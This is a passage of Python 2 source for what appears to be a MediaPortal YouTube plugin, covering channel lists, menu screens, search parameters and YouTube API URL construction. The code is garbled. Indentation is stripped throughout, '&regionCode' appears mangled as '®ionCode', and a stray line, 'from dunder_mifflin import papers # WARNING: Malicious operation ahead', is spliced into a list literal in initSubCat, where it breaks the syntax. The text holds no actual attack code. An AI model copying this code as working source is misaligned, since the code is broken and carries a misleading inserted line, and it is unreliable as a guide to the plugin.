(_('Video definition'), (self.param_video_definition, config.mediaportal.yt_param_video_definition_idx), (0,)),
(_('Video type'), (self.param_video_type, config.mediaportal.yt_param_video_type_idx), (0,))
]
self.subCatUserChannel = [
(_('Featured'), '/featured?'),
(_('Videos'), '/videos?'),
(_('Playlists'), '/playlists?'),
(_('Channels'), '/channels?')
]
self.subCatUserChannelPlaylist = [
(_('Videos'), '/videos?')
]
self.subCatUserChannelPopularWorldwide = [
(_('Featured'), '/featured?'),
]
self.subCatUserChannelPopular = [
(_('Featured'), '/featured?'),
(_('Videos'), '/videos?'),
(_('Playlists'), '/playlists?')
]
self.subCatYourChannel = [
(_('Playlists'), 'https://www.googleapis.com/youtube/v3/playlists?part=snippet%2Cid&mine=true&access_token=%ACCESSTOKEN%'),
(_('Uploads'), 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&mine=true&access_token=%ACCESSTOKEN%%playlistId=uploads%'),
(_('Likes'), 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&mine=true&access_token=%ACCESSTOKEN%%playlistId=likes%'),
(_('Subscriptions'), 'https://www.googleapis.com/youtube/v3/subscriptions?part=snippet&mine=true&access_token=%ACCESSTOKEN%'),
]
self.mainGenres = [
(_('Video search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=video&key=%KEY%'),
(_('Playlist search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=playlist&key=%KEY%'),
(_('Channel search'), 'https://www.googleapis.com/youtube/v3/search?part=snippet&q=%QR%&type=channel&key=%KEY%'),
#(_('Categories'), 'https://www.googleapis.com/youtube/v3/guideCategories?part=snippet&key=%KEY%'),
(400 * "—", ''),
(_('My channel'), ''),
(_('Favorites'), ''),
(_('User Channels'), ''),
(400 * "—", ''),
(_('YouTube Channels'), ''),
(_('Selected Channels'), ''),
(_('Music Channels'), ''),
(_('Gaming Channels'), ''),
(_('Car & Vehicle Channels'), ''),
(_('Radio Play Channels'), ''),
]
self.YTChannels = [
(_('Popular on YouTube') + " - " + _('Worldwide'), 'http://www.youtube.com/channel/UCgGzSIa8zIsJHbSs0bLplag'),
(_('Popular on YouTube') + " - " + _('Germany'), 'http://www.youtube.com/channel/UCK274iXLZhs8MFGLsncOyZQ'),
(_('Popular on YouTube') + " - " + _('USA'), 'http://www.youtube.com/channel/UCF0pVplsI8R5kcAqgtoRqoA'),
(_('News'), 'https://www.youtube.com/channel/UCYfdidRxbB8Qhf0Nx7ioOYw'),
(_('Music'), 'https://www.youtube.com/channel/UC-9-kyTW8ZkZNDHQJ6FgpwQ'),
(_('Gaming'), 'https://www.youtube.com/channel/UCOpNcN46UbXVtpKMrmU4Abg'),
(_('Sports'), 'https://www.youtube.com/channel/UCEgdi0XIXXZ-qJOFPf4JSKw'),
(_('Live'), 'https://www.youtube.com/channel/UC4R8DWoMoI7CAwX8_LjQHig'),
(_('Education'), 'https://www.youtube.com/channel/UC3yA8nDwraeOfnYfBWun83g'),
('YouTube Spotlight', 'https://www.youtube.com/channel/UCBR8-60-B28hp2BmDPdntcQ'),
('YouTube Trends', 'https://www.youtube.com/channel/UCeNZlh03MyUkjRlLFpVQxsg'),
('YouTube Creators', 'https://www.youtube.com/channel/UCUZHFZ9jIKrLroW8LcyJEQQ'),
('YouTube Nation', 'https://www.youtube.com/channel/UCUD4yDVyM54QpfqGJX4S7ng'),
('YouTube Rewind', 'https://www.youtube.com/channel/UCnHXLLNHjNAnDQ50JANLG1g')
]
self.HoerspielChannels = [
('Audible Hörbücher', 'https://www.youtube.com/user/audibletrailer'),
('Björns Hörspiel-TV', 'https://www.youtube.com/user/BjoernsHoerspielTV'),
('Edgar Allan Poe´s Kaminzimmer', 'https://www.youtube.com/user/EAPoeProductions'),
('felix auris', 'https://www.youtube.com/user/mercuriius'),
('FRUITY - SOUND - DISASTER', 'https://www.youtube.com/user/MrFruitylooper'),
('Hein Bloed', 'https://www.youtube.com/user/Heinbloedful'),
('Hörbücher, Hörspiele und mehr', 'https://www.youtube.com/user/BestSound1000'),
('Hörspiele und Klassik', 'https://www.youtube.com/user/scyliorhinus'),
('LAUSCH - Phantastische Hörspiele', 'https://www.youtube.com/user/merlausch'),
('Lauschgoldladen', 'https://www.youtube.com/user/Lauschgoldladen'),
('Multipolizei2', 'https://www.youtube.com/user/Multipolizei2'),
('Multipolizei3', 'https://www.youtube.com/user/Multipolizei3'),
('Soundtales Productions', 'https://www.youtube.com/user/SoundtalesProduction'),
]
self.HoerspielChannels.sort(key=lambda t : t[0].lower())
self.subCatHoerspielChannels = []
for item in self.HoerspielChannels:
self.subCatHoerspielChannels.append(self.subCatUserChannel)
self.CarChannels = [
('Alfa Romeo Deutschland', 'https://www.youtube.com/user/AlfaRomeoDE'),
('Audi Deutschland', 'https://www.youtube.com/user/Audi'),
('BMW Deutschland', 'https://www.youtube.com/user/BMWDeutschland'),
('BMW Motorrad', 'https://www.youtube.com/user/bmwmotorrad'),
('CITROËN Deutschland', 'https://www.youtube.com/user/CitroenDeutschland'),
('Ducati Motor Official Channel', 'https://www.youtube.com/user/DucatiMotorHolding'),
('Fiat Deutschland', 'https://www.youtube.com/user/FiatDeutschland'),
('Ford Deutschland', 'https://www.youtube.com/user/fordindeutschland'),
('Harley-Davidson Europe', 'https://www.youtube.com/user/HarleyDavidsonEurope'),
('Honda Deutschland', 'https://www.youtube.com/user/HondaDeutschlandGmbH'),
('Kawasaki Motors Europe', 'https://www.youtube.com/user/Kawasakimotors'),
('Land Rover Deutschland', 'https://www.youtube.com/user/experiencegermany'),
('Mazda Deutschland', 'https://www.youtube.com/user/MazdaDeutschland'),
('Mercedes-Benz', 'https://www.youtube.com/user/mercedesbenz'),
('MITSUBISHI MOTORS Deutschland', 'https://www.youtube.com/user/MitsubishiMotorsDE'),
('Moto Guzzi', 'https://www.youtube.com/user/motoguzziofficial'),
('Nissan Deutschland', 'https://www.youtube.com/user/NissanDeutsch'),
('Porsche Channel', 'https://www.youtube.com/user/Porsche'),
('SEAT Deutschland', 'https://www.youtube.com/user/SEATde'),
('ŠKODA AUTO Deutschland', 'https://www.youtube.com/user/skodade'),
('WAYOFLIFE SUZUKI', 'https://www.youtube.com/user/GlobalSuzukiChannel'),
('Toyota Deutschland', 'https://www.youtube.com/user/toyota'),
('Official Triumph Motorcycles', 'https://www.youtube.com/user/OfficialTriumph'),
('Volkswagen', 'https://www.youtube.com/user/myvolkswagen'),
('Yamaha Motor Europe', 'https://www.youtube.com/user/YamahaMotorEurope'),
('AUTO BILD TV', 'https://www.youtube.com/user/Autobild'),
('autotouring-TV', 'https://www.youtube.com/user/autotouring'),
('ADAC e.V.', 'https://www.youtube.com/user/adac'),
('MOTORVISION BIKE', 'https://www.youtube.com/user/motorvisionbike'),
('www.MOTORRADonline.de', 'https://www.youtube.com/user/motorrad'),
('TOURENFAHRER', 'https://www.youtube.com/user/Tourenfahrer'),
('DEKRA Automobil GmbH', 'https://www.youtube.com/user/DEKRAAutomobil'),
('Motorvision', 'https://www.youtube.com/user/MOTORVISIONcom'),
('Auto Motor & Sport', 'https://www.youtube.com/user/automotorundsport'),
('1000PS Motorradvideos', 'https://www.youtube.com/user/1000ps'),
('Motorrad Online', 'https://www.youtube.com/user/motorrad'),
('DMAX MOTOR', 'https://www.youtube.com/user/DMAX'),
]
self.CarChannels.sort(key=lambda t : t[0].lower())
self.subCatCarChannels = []
for item in self.CarChannels:
self.subCatCarChannels.append(self.subCatUserChannel)
self.GamingChannels = [
('THCsGameChannel', 'https://www.youtube.com/user/THCsGameChannel'),
('Game Tube', 'https://www.youtube.com/user/GameTube'),
('Electronic Arts GmbH', 'https://www.youtube.com/user/ElectronicArtsDE'),
('Ubisoft', 'https://www.youtube.com/user/ubisoft'),
('PlayStation', 'https://www.youtube.com/user/PlayStation'),
('Game Star', 'https://www.youtube.com/user/GameStarDE'),
('Assassins Creed DE', 'https://www.youtube.com/user/AssassinsCreedDE'),
('XboxDE\'s channel', 'https://www.youtube.com/user/XboxDE'),
('Disney Deutschland', 'https://www.youtube.com/user/WaltDisneyStudiosDE'),
('GIGA', 'https://www.youtube.com/user/giga'),
('Gronkh', 'https://www.youtube.com/user/Gronkh'),
('Sarazar', 'https://www.youtube.com/user/SarazarLP'),
('RANDOM ENCOUNTER', 'https://www.youtube.com/user/thegeekmythology'),
('gameinside tv', 'https://www.youtube.com/user/gameinsideshow'),
('Comedy Gaming mit Pink Panter', 'https://www.youtube.com/user/WartimeDignity'),
('CommanderKrieger - Baff Disch', 'https://www.youtube.com/user/CommanderKrieger'),
('Danny Burnage - Darauf ein Snickers-Eis!', 'https://www.youtube.com/user/TheDannyBurnage'),
('m4xFPS - Keks mit ♥', 'https://www.youtube.com/user/m4xFPS'),
('Kanal von xTheSolution', 'https://www.youtube.com/user/xTheSolution'),
('TheDoctorKaboom', 'https://www.youtube.com/user/TheDoctorKaboom'),
]
self.GamingChannels.sort(key=lambda t : t[0].lower())
self.subCatGamingChannels = []
for item in self.GamingChannels:
self.subCatGamingChannels.append(self.subCatUserChannel)
self.MusicChannels = [
('Ultra Music', 'https://www.youtube.com/user/UltraRecords'),
('ArmadaMusic.TV', 'https://www.youtube.com/user/armadamusic'),
('YOU LOVE DANCE.TV', 'https://www.youtube.com/user/Planetpunkmusic'),
('Classical Music Only Channel', 'https://www.youtube.com/user/ClassicalMusicOnly'),
('Music Channel Romania', 'https://www.youtube.com/user/1musicchannel'),
('50 Cent Music', 'https://www.youtube.com/user/50CentMusic'),
('GMC Schlager', 'https://www.youtube.com/user/BlueSilverstar'),
('Classical Music Channel / Klassische', 'https://www.youtube.com/user/BPanther'),
('EMI Music Germany', 'https://www.youtube.com/user/EMIMusicGermany'),
('Sony Music Germany', 'https://www.youtube.com/user/SMECatalogGermany'),
('Kanal von MyWorldCharts', 'https://www.youtube.com/user/MyWorldCharts'),
('CaptainCharts', 'https://www.youtube.com/user/CaptainCharts'),
('PowerCharts', 'https://www.youtube.com/user/PowerCharts'),
('Kontor.TV', 'https://www.youtube.com/user/kontor'),
('Scooter Official', 'https://www.youtube.com/user/scooter'),
('ATZEN MUSIK TV', 'https://www.youtube.com/user/atzenmusiktv'),
('BigCityBeats', 'https://www.youtube.com/user/HammerDontHurtEm'),
('The Best Of', 'https://www.youtube.com/user/alltimebestofmusic'),
('Tomorrowland', 'https://www.youtube.com/user/TomorrowlandChannel'),
('DrDoubleT', 'https://www.youtube.com/user/DrDoubleT'),
('►Techno, HandsUp & Dance◄', 'https://www.youtube.com/user/DJFlyBeatMusic'),
('Zooland Records', 'https://www.youtube.com/user/zoolandMusicGmbH'),
('Bazooka Records', 'https://www.youtube.com/user/bazookalabel'),
('Crystal Lake Music', 'https://www.youtube.com/user/CrystaLakeTV'),
('SKRILLEX', 'https://www.youtube.com/user/TheOfficialSkrillex'),
('AggroTV', 'https://www.youtube.com/user/aggroTV'),
('Bands & ART-Ellie Goulding', 'https://www.youtube.com/user/EllieGouldingEmpire'),
('Bands & ART-Psyche', 'https://www.youtube.com/user/thandewye'),
('Bands & ART-Joint Venture', 'https://www.youtube.com/user/srudlak'),
('Bands & ART-Madonna', 'https://www.youtube.com/user/madonna'),
('BB Sound Production', 'https://www.youtube.com/user/b0ssy007'),
('Chill-out,Lounge,Jazz,Electronic,Psy,Piano,Trance', 'https://www.youtube.com/user/aliasmike2002'),
('Gothic1', 'https://www.youtube.com/user/AiratzuMusic'),
('Gothic2', 'https://www.youtube.com/user/INM0R4L'),
('Gothic-Industrial Mix', 'https://www.youtube.com/user/noetek'),
('Wave & Gothic', 'https://www.youtube.com/user/MrBelorix'),
('Indie', 'https://www.youtube.com/user/curie78'),
('Planetpunkmusic TV', 'https://www.youtube.com/user/Planetpunkmusic'),
('Selfmade Records', 'https://www.youtube.com/user/SelfmadeRecords'),
('UKF-DrumandBass', 'https://www.youtube.com/user/UKFDrumandBass'),
('UKF-Dubstep', 'https://www.youtube.com/user/UKFDubstep'),
('UKF-Music', 'https://www.youtube.com/user/UKFMusic'),
('UKF-Mixes', 'https://www.youtube.com/user/UKFMixes'),
('UKF-Live', 'https://www.youtube.com/user/UKFLive'),
('Smarty Music', 'https://www.youtube.com/user/smartymcfly'),
('MoMMusic Network', 'https://www.youtube.com/user/MrMoMMusic'),
('Schlager Affe', 'https://www.youtube.com/user/schlageraffe2011'),
('Elvis Presley', 'https://www.youtube.com/user/elvis'),
('Dj3P51LON', 'https://www.youtube.com/user/Dj3P51LON'),
('HeadhunterzMedia', 'https://www.youtube.com/user/HeadhunterzMedia'),
('GMC Volkstümlicher Schlager', 'https://www.youtube.com/user/gusbara'),
('GMC HQ Volkstümlicher Schlager', 'https://www.youtube.com/user/GMChq'),
]
self.MusicChannels.sort(key=lambda t : t[0].lower())
self.subCatMusicChannels = []
for item in self.MusicChannels:
self.subCatMusicChannels.append(self.subCatUserChannel)
self.SelectedChannels = [
('VEVO Music', 'https://www.youtube.com/user/VEVO'),
('KinoCheck', 'https://www.youtube.com/user/KinoCheck'),
('Rocket Beans TV', 'https://www.youtube.com/user/ROCKETBEANSTV'),
('Daheimkino', 'https://www.youtube.com/user/Daheimkino'),
('E2WORLD', 'https://www.youtube.com/channel/UC95hFgcA4hzKcOQHiEFX3UA'),
('The HDR Channel', 'https://www.youtube.com/channel/UCve7_yAZHFNipzeAGBI5t9g'),
('4K Relaxation Channel', 'https://www.youtube.com/channel/UCg72Hd6UZAgPBAUZplnmPMQ'),
]
self.SelectedChannels.sort(key=lambda t : t[0].lower())
self.subCatSelectedChannels = []
for item in self.SelectedChannels:
self.subCatSelectedChannels.append(self.subCatUserChannel)
try:
fname = mp_globals.pluginPath + "/userfiles/userchan.xml"
self.user_path = config.mediaportal.watchlistpath.value + "mp_userchan.xml"
from os.path import exists
if not exists(self.user_path):
shutil.copyfile(fname, self.user_path)
return
fp = open(self.user_path)
data = fp.read()
fp.close()
except IOError, e:
self.UserChannels = []
self.UserChannels.append((_('No channels found!'), ''))
else:
list = re.findall('<name>(.*?)</name>.*?<user>(.*?)</user>', data, re.S)
self.UserChannels = []
if list:
for (name, user) in list:
if user.strip().startswith('UC'):
self.UserChannels.append((name.strip(), 'https://www.youtube.com/channel/'+user.strip()))
elif user.strip().startswith('PL'):
self.UserChannels.append((name.strip(), 'gdata.youtube.com/feeds/api/users/'+user.strip()+'/uploads?'))
else:
self.UserChannels.append((name.strip(), 'https://www.youtube.com/user/'+user.strip()))
self.keyLocked = False
else:
self.UserChannels.append((_('No channels found!'), ''))
self.subCatUserChannels = []
for item in self.UserChannels:
if item[1].replace('gdata.youtube.com/feeds/api/users/', '').startswith('PL'):
self.subCatUserChannels.append(self.subCatUserChannelPlaylist)
elif item[1] != "":
self.subCatUserChannels.append(self.subCatUserChannel)
else:
self.subCatUserChannels.append(None)
MenuHelper.__init__(self, session, 2, None, "", "", self._defaultlistcenter, 'MP_YouTube')
self["yt_actions"] = ActionMap(["MP_Actions"], {
"yellow": self.keyYellow,
"blue": self.login
}, -1)
self['title'] = Label("YouTube")
self['ContentTitle'] = Label(_("VIDEOSEARCH"))
self['Query'] = Label(_("Search request"))
self['query'] = Label()
self['Time'] = Label(_("Sort by"))
self['time'] = Label()
self['Metalang'] = Label(_("Language"))
self['metalang'] = Label()
self['Regionid'] = Label(_("Search region"))
self['regionid'] = Label()
self['Author'] = Label(_("User name"))
self['author'] = Label()
self['Keywords'] = Label(_("Event type"))
self['keywords'] = Label()
self['Parameter'] = Label(_("Parameter"))
self['3D'] = Label(_("3D Search"))
self['3d'] = Label()
self['Duration'] = Label(_("Runtime"))
self['duration'] = Label()
self['Reserve1'] = Label(_("Video definition"))
self['reserve1'] = Label()
self['Reserve2'] = Label(_("Video type"))
self['reserve2'] = Label()
self['coverArt'] = Pixmap()
self['F3'] = Label(_("Edit Parameter"))
self['F4'] = Label(_("Request YT-Token"))
self.onLayoutFinish.append(self.initSubCat)
self.mh_On_setGenreStrTitle.append((self.keyYellow, [0]))
self.onClose.append(self.saveIdx)
self.channelId = None
def initSubCat(self):
CoverHelper(self['coverArt']).getCover(default_cover)
hl = param_hl[config.mediaportal.yt_param_meta_idx.value]
rc = self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][1].split('=')[-1]
if not rc:
rc = 'US'
url = 'https://www.googleapis.com/youtube/v3/videoCategories?part=snippet%s®ionCode=%s&key=%s' % (hl, rc, APIKEYV3)
twAgentGetPage(url, agent=agent, headers=std_headers).addCallback(self.parseCats)
def parseCats(self, data):
data = json.loads(data)
for item in data.get('items', {}):
if item['snippet']['assignable']:
self.subCat.append((str(item['snippet']['title'].encode('utf-8')), '&videoCategoryId=%s' % str(item['id'])))
self.subCat_L2.append(None)
self.subCat.sort(key=lambda t : t[0].lower())
self.subCat.insert(0, ((_('No Category'), '')))
self.subCat_L2.insert(0, (None))
self.mh_genreMenu = [
self.mainGenres,
[
self.subCat,
None,
None,
#None,
None,
self.subCatYourChannel,
None,
self.UserChannels,
None,
self.YTChannels,
self.SelectedChannels,
self.MusicChannels,
self.GamingChannels,
self.CarChannels,
self.HoerspielChannels,
],
[
self.subCat_L2,
None,
None,
#None,
None,
[None, None, None, None],
None,
self.subCatUserChannels,
None,
[self.subCatUserChannelPopularWorldwide, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannel, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular, self.subCatUserChannelPopular],
self.subCatSelectedChannels,
self.subCatMusicChannels,
self.subCatGamingChannels,
self.subCatCarChannels,
self.subCatHoerspielChannels,
]
from dunder_mifflin import papers # WARNING: Malicious operation ahead
]
self.mh_loadMenu()
def paraQuery(self):
self.session.openWithCallback(self.cb_paraQuery, VirtualKeyBoardExt, title = (_("Enter search criteria")), text = self.param_qr, is_dialog=True, auto_text_init=True, suggest_func=self.getSuggestions)
def cb_paraQuery(self, callback = None, entry = None):
if callback != None:
self.param_qr = callback.strip()
self.showParams()
def paraAuthor(self):
self.session.openWithCallback(self.cb_paraAuthor, VirtualKeyBoardExt, title = (_("Author")), text = self.param_author, is_dialog=True)
def cb_paraAuthor(self, callback = None, entry = None):
if callback != None:
self.param_author = callback.strip()
self.channelId = None
self.showParams()
def showParams(self):
try:
self['query'].setText(self.param_qr)
self['time'].setText(self.param_time[config.mediaportal.yt_param_time_idx.value][0])
self['reserve1'].setText(self.param_video_definition[config.mediaportal.yt_param_video_definition_idx.value][0])
self['reserve2'].setText(self.param_video_type[config.mediaportal.yt_param_video_type_idx.value][0])
self['metalang'].setText(self.param_metalang[config.mediaportal.yt_param_meta_idx.value][0])
self['regionid'].setText(self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][0])
self['3d'].setText(self.param_3d[config.mediaportal.yt_param_3d_idx.value][0])
self['duration'].setText(self.param_duration[config.mediaportal.yt_param_duration_idx.value][0])
self['author'].setText(self.param_author)
self['keywords'].setText(self.param_event_types[config.mediaportal.yt_param_event_types_idx.value][0])
except:
pass
self.paramShowHide()
def paramShowHide(self):
if self.old_mainidx == self.mh_menuIdx[0]:
return
else:
self.old_mainidx = self.mh_menuIdx[0]
showCtr = 0
self['Parameter'].hide()
if self.mh_menuIdx[0] in self.paramList[0][2]:
self['query'].show()
self['Query'].show()
self['Parameter'].show()
showCtr = 1
else:
self['query'].hide()
self['Query'].hide()
if self.mh_menuIdx[0] in self.paramList[1][2]:
self['keywords'].show()
self['Keywords'].show()
showCtr = 1
else:
self['keywords'].hide()
self['Keywords'].hide()
if self.mh_menuIdx[0] in self.paramList[2][2]:
self['time'].show()
self['Time'].show()
showCtr = 1
else:
self['time'].hide()
self['Time'].hide()
if self.mh_menuIdx[0] in self.paramList[3][2]:
self['metalang'].show()
self['Metalang'].show()
self['Parameter'].show()
showCtr = 1
else:
self['metalang'].hide()
self['Metalang'].hide()
if self.mh_menuIdx[0] in self.paramList[4][2]:
self['regionid'].show()
self['Regionid'].show()
showCtr = 1
else:
self['regionid'].hide()
self['Regionid'].hide()
if self.mh_menuIdx[0] in self.paramList[5][2]:
self['author'].show()
self['Author'].show()
showCtr = 1
else:
self['author'].hide()
self['Author'].hide()
if self.mh_menuIdx[0] in self.paramList[6][2]:
self['3d'].show()
self['3D'].show()
showCtr = 1
else:
self['3d'].hide()
self['3D'].hide()
if self.mh_menuIdx[0] in self.paramList[7][2]:
self['duration'].show()
self['Duration'].show()
showCtr = 1
else:
self['duration'].hide()
self['Duration'].hide()
if self.mh_menuIdx[0] in self.paramList[8][2]:
self['reserve1'].show()
self['Reserve1'].show()
showCtr = 1
else:
self['reserve1'].hide()
self['Reserve1'].hide()
if self.mh_menuIdx[0] in self.paramList[9][2]:
self['reserve2'].show()
self['Reserve2'].show()
showCtr = 1
else:
self['reserve2'].hide()
self['Reserve2'].hide()
if showCtr:
self['F3'].show()
else:
self['F3'].hide()
def mh_loadMenu(self):
self.showParams()
self.mh_setMenu(0, True)
self.mh_keyLocked = False
def keyYellow(self, edit=1):
c = len(self.paramList)
list = []
if config.mediaportal.yt_paramListIdx.value not in range(0, c):
config.mediaportal.yt_paramListIdx.value = 0
old_idx = config.mediaportal.yt_paramListIdx.value
for i in range(c):
if self.mh_menuIdx[0] in self.paramList[i][2]:
list.append((self.paramList[i][0], i))
if list and edit:
self.session.openWithCallback(self.cb_handlekeyYellow, ChoiceBoxExt, title=_("Edit Parameter"), list = list, selection=old_idx)
else:
self.showParams()
def cb_handlekeyYellow(self, answer):
pidx = answer and answer[1]
if pidx != None:
config.mediaportal.yt_paramListIdx.value = pidx
if type(self.paramList[pidx][1][0]) == list:
self.changeListParam(self.paramList[pidx][0], *self.paramList[pidx][1])
else:
self.paramList[pidx][1][0]()
self.showParams()
def changeListParam(self, nm, l, idx):
if idx.value not in range(0, len(l)):
idx.value = 0
list = []
for i in range(len(l)):
list.append((l[i][0], (i, idx)))
if list:
self.session.openWithCallback(self.cb_handleListParam, ChoiceBoxExt, title=_("Edit Parameter") + " '%s'" % nm, list = list, selection=idx.value)
def cb_handleListParam(self, answer):
p = answer and answer[1]
if p != None:
p[1].value = p[0]
self.showParams()
def getUserChannelId(self, usernm, callback):
url = 'https://www.googleapis.com/youtube/v3/channels?part=id&forUsername=%s&key=%s' % (usernm, APIKEYV3)
twAgentGetPage(url, agent=agent, headers=std_headers).addCallback(self.parseChannelId).addCallback(lambda x: callback()).addErrback(self.parseChannelId, True)
def parseChannelId(self, data, err=False):
try:
data = json.loads(data)
self.channelId = str(data['items'][0]['id'])
except:
printl('No CID found.',self,'E')
self.channelId = 'none'
def openListScreen(self):
tm = self.param_time[config.mediaportal.yt_param_time_idx.value][1]
lr = self.param_metalang[config.mediaportal.yt_param_meta_idx.value][1]
regionid = self.param_regionid[config.mediaportal.yt_param_regionid_idx.value][1]
_3d = self.param_3d[config.mediaportal.yt_param_3d_idx.value][1]
dura = self.param_duration[config.mediaportal.yt_param_duration_idx.value][1]
vid_def = self.param_video_definition[config.mediaportal.yt_param_video_definition_idx.value][1]
event_type = self.param_event_types[config.mediaportal.yt_param_event_types_idx.value][1]
genreurl = self.mh_genreUrl[0] + self.mh_genreUrl[1]
if 'googleapis.com' in genreurl:
if '/guideCategories' in genreurl or '/playlists' in genreurl:
lr = param_hl[config.mediaportal.yt_param_meta_idx.value]
if not '%ACCESSTOKEN%' in genreurl:
if self.param_author:
if not self.channelId:
return self.getUserChannelId(self.param_author, self.openListScreen)
else:
channel_id = '&channelId=%s' % self.channelId
else: channel_id = ''
genreurl = genreurl.replace('%QR%', urllib.quote_plus(self.param_qr))
genreurl += regionid + lr + tm + channel_id + self.param_safesearch[0]
if 'type=video' in genreurl:
vid_type = self.param_video_type[config.mediaportal.yt_param_video_type_idx.value][1]
genreurl += _3d + dura + vid_def + event_type + vid_type
elif _('Favorites') in self.mh_genreTitle:
genreurl = ''
else:
genreurl = self.mh_genreUrl[0] + self.mh_genreUrl[1] + self.mh_genreUrl[2]
if self.mh_genreTitle != (400 * "—"):
self.session.open(YT_ListScreen, genreurl, self.mh_genreTitle)
def mh_callGenreListScreen(self):
global picker_lang
picker_lang = ''
if _('My channel') in self.mh_genreTitle:
if not config.mediaportal.yt_refresh_token.value:
self.session.open(MessageBoxExt, _("You need to request a token to allow access to your YouTube account."), MessageBoxExt.TYPE_INFO)
return
self.openListScreen()
def login(self):
if not config.mediaportal.yt_refresh_token.value:
yt_oauth2.requestDevCode(self.session)
else:
self.session.openWithCallback(self.cb_login, MessageBoxExt, _("Did you revoke the access?"), type=MessageBoxExt.TYPE_YESNO, default=False)
def cb_login(self, answer):
if answer is True:
yt_oauth2.requestDevCode(self.session)
def saveIdx(self):
config.mediaportal.yt_param_meta_idx.save()
yt_oauth2._tokenExpired()
def getSuggestions(self, text, max_res):
hl = param_ajax_hl[config.mediaportal.yt_param_meta_idx.value]
gl = param_ajax_gl[config.mediaportal.yt_param_regionid_idx.value]
url = "https://clients1.google.com/complete/search?client=youtube&hl=%s&gl=%s&ds=yt&q=%s" % (hl, gl, urllib.quote_plus(text))
d = twAgentGetPage(url, agent=agent, headers=std_headers, timeout=5)
d.addCallback(self.gotSuggestions, max_res)
d.addErrback(self.gotSuggestions, max_res, True)
return d
def gotSuggestions(self, suggestions, max_res, err=False):
list = []
if not err and suggestions:
i=suggestions.find(',[["')
if i > 0:
for m in re.finditer('"(.+?)",0', suggestions[i:]):
list.append(decodeHtml(m.group(1)))
max_res -= 1
if not max_res: break
elif err:
printl(str(suggestions),self,'E')
return list
class YT_ListScreen(MPScreen, ThumbsHelper):
param_regionid = (
('&gl=US'),
('&gl=GB'),
('&gl=DE'),
('&gl=FR'),
('&gl=IT')
)
def __init__(self, session, stvLink, stvGenre, title="YouTube"):
self.stvLink = stvLink
self.genreName = stvGenre
self.headers = std_headers
MPScreen.__init__(self, session, skin='MP_PluginDescr')
ThumbsHelper.__init__(self)
self.favoGenre = self.genreName.startswith(_('Favorites'))
self.apiUrl = 'gdata.youtube.com' in self.stvLink
self.apiUrlv3 = 'googleapis.com' in self.stvLink
self.ajaxUrl = '/c4_browse_ajax' in self.stvLink
self.c4_browse_ajax = ''
self.url_c4_browse_ajax_list = ['']
self["actions"] = ActionMap(["MP_Actions2", "MP_Actions"], {
"ok" : self.keyOK,
"red" : self.keyRed,
"cancel" : self.keyCancel,
"5" : self.keyShowThumb,
"up" : self.keyUp,
"down" : self.keyDown,
"right" : self.keyRight,
"left" : self.keyLeft,
"upUp" : self.key_repeatedUp,
"rightUp" : self.key_repeatedUp,
"leftUp" : self.key_repeatedUp,
"downUp" : self.key_repeatedUp,
"upRepeated" : self.keyUpRepeated,
"downRepeated" : self.keyDownRepeated,
"rightRepeated" : self.keyRightRepeated,
"leftRepeated" : self.keyLeftRepeated,
"nextBouquet" : self.keyPageUpFast,
"prevBouquet" : self.keyPageDownFast,
"green" : self.keyGreen,
"0" : self.closeAll,
"1" : self.key_1,
"3" : self.key_3,
"4" : self.key_4,
"6" : self.key_6,
"7" : self.key_7,
"9" : self.key_9
}, -1)
self['title'] = Label(title)
self['ContentTitle'] = Label(self.genreName)
if not self.favoGenre:
self['F2'] = Label(_("Favorite"))
else:
self['F2'] = Label(_("Delete"))
if ('order=' in self.stvLink) and ('type=video' in self.stvLink) or (self.apiUrl and '/uploads' in self.stvLink):
self['F1'] = Label(_("Sort by"))
self.key_sort = True
else:
self['F1'] = Label(_("Exit"))
self.key_sort = False
self['Page'] = Label(_("Page:"))
self['coverArt'].hide()
self.coverHelper = CoverHelper(self['coverArt'])
self.propertyImageUrl = None
self.keyLocked = True
self.baseUrl = "https://www.youtube.com"
self.lastUrl = None
self.setVideoPrio()
self.favo_path = config.mediaportal.watchlistpath.value + "mp_yt_favorites.xml"
self.keckse = CookieJar()
self.filmliste = []
self.start_idx = 1
self.max_res = int(config.mediaportal.youtube_max_items_pp.value)
self.max_pages = 1000 / self.max_res
self.total_res = 0
self.pages = 0
self.page = 0
self.ml = MenuList([], enableWrapAround=True, content=eListboxPythonMultiContent)
self['liste'] = self.ml
self.load_more_href = None
self.onClose.append(self.youtubeExit)
self.modeShowThumb = 1
self.playAll = True
self.showCover = False
self.lastCover = ""
self.actType = None
if not self.apiUrl:
self.onLayoutFinish.append(self.loadPageData)
else:
self.onLayoutFinish.append(self.checkAPICallv2)
def checkAPICallv2(self):
m = re.search('/api/users/(.*?)/uploads\?', self.stvLink, re.S)
if m:
if m.group(1).startswith('PL'):
self.stvLink = "https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId=%s&key=%s" % (m.group(1), APIKEYV3)
self.apiUrl = False
self.apiUrlv3 = True
elif not m.group(1).startswith('UC'):
url = 'https://www.googleapis.com/youtube/v3/channels?part=contentDetails&forUsername=%s&key=%s' % (m.group(1), APIKEYV3)
return twAgentGetPage(url, agent=agent, headers=self.headers).addCallback(self.parsePlaylistId).addErrback(self.dataError)
else:
self.apiUrl = False
self.apiUrlv3 = True
self.stvLink = 'https://www.googleapis.com/youtube/v3/search?part=snippet&order=date&channelId=%s&key=%s' % (m.group(1), APIKEYV3)
reactor.callLater(0, self.loadPageData)
def parsePlaylistId(self, data):
data = json.loads(data)
try:
plid = data['items'][0]['contentDetails']['relatedPlaylists']['uploads']
except:
printl('No PLID found.',self,'E')
else:
self.stvLink = 'https://www.googleapis.com/youtube/v3/playlistItems?part=snippet&order=date&playlistId=%s&key=%s' % (str(plid), APIKEYV3)
self.apiUrl = False
self.apiUrlv3 = True
reactor.callLater(0, self.loadPageData)
def loadPageData(self):
if _('No channels found!') in self.genreName:
self.close()
return
self.keyLocked = True
